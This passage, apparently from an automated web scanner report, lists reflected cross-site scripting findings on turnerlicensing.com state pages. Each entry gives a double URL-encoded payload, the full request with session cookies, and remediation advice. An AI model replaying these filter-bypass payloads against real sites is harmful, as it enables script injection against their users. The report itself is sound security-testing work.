The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Calgary?7cdd3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278d075c1b2de=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.189. http://www.turnerlicensing.com/teams_by_state/California [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/California
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e8313%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252773dad229e98 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e8313'style='x:expression(alert(1))'73dad229e98 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/California?e8313%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252773dad229e98=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.190. http://www.turnerlicensing.com/teams_by_state/Colorado [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Colorado
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 43f2c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252725987bedbdc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 43f2c'style='x:expression(alert(1))'25987bedbdc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Colorado?43f2c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252725987bedbdc=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.191. http://www.turnerlicensing.com/teams_by_state/Connecticut [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Connecticut
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6b72d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527146d7de1dc2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6b72d'style='x:expression(alert(1))'146d7de1dc2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Connecticut?6b72d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527146d7de1dc2=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.192. http://www.turnerlicensing.com/teams_by_state/Delaware [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Delaware
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e8bba%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f6b9aaa7370 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e8bba'style='x:expression(alert(1))'f6b9aaa7370 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Delaware?e8bba%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f6b9aaa7370=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.193. http://www.turnerlicensing.com/teams_by_state/Edmonton [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Edmonton
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dbb0f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527eba22f9b445 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dbb0f'style='x:expression(alert(1))'eba22f9b445 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Edmonton?dbb0f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527eba22f9b445=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.194. http://www.turnerlicensing.com/teams_by_state/Florida [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Florida
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6608e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527462ed1390c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6608e'style='x:expression(alert(1))'462ed1390c5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Florida?6608e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527462ed1390c5=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.195. http://www.turnerlicensing.com/teams_by_state/Georgia [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Georgia
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cd6fd%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252766d636fc045 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cd6fd'style='x:expression(alert(1))'66d636fc045 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Georgia?cd6fd%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252766d636fc045=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.196. http://www.turnerlicensing.com/teams_by_state/Hawaii [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Hawaii
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8d2a5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278b5f9f5f3a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8d2a5'style='x:expression(alert(1))'8b5f9f5f3a5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Hawaii?8d2a5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278b5f9f5f3a5=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.197. http://www.turnerlicensing.com/teams_by_state/Idaho [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Idaho
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1b675%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252773c56e3d4b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1b675'style='x:expression(alert(1))'73c56e3d4b3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Idaho?1b675%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252773c56e3d4b3=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.198. http://www.turnerlicensing.com/teams_by_state/Illinois [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Illinois
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a8939%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527a322cf42a27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a8939'style='x:expression(alert(1))'a322cf42a27 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Illinois?a8939%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527a322cf42a27=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.199. http://www.turnerlicensing.com/teams_by_state/Indiana [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Indiana
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ddb83%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252731d9a9bbd80 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ddb83'style='x:expression(alert(1))'31d9a9bbd80 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Indiana?ddb83%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252731d9a9bbd80=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.200. http://www.turnerlicensing.com/teams_by_state/Iowa [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Iowa
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7a3d8%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252757114ddf99c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7a3d8'style='x:expression(alert(1))'57114ddf99c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Iowa?7a3d8%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252757114ddf99c=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.201. http://www.turnerlicensing.com/teams_by_state/Kansas [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Kansas
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b1e4f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252777e22b95d60 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b1e4f'style='x:expression(alert(1))'77e22b95d60 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Kansas?b1e4f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252777e22b95d60=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.202. http://www.turnerlicensing.com/teams_by_state/Kentucky [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Kentucky
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7860b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527bb84182b6d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7860b'style='x:expression(alert(1))'bb84182b6d5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Kentucky?7860b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527bb84182b6d5=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.203. http://www.turnerlicensing.com/teams_by_state/Louisiana [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Louisiana
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e214f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278a4ef989e82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e214f'style='x:expression(alert(1))'8a4ef989e82 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
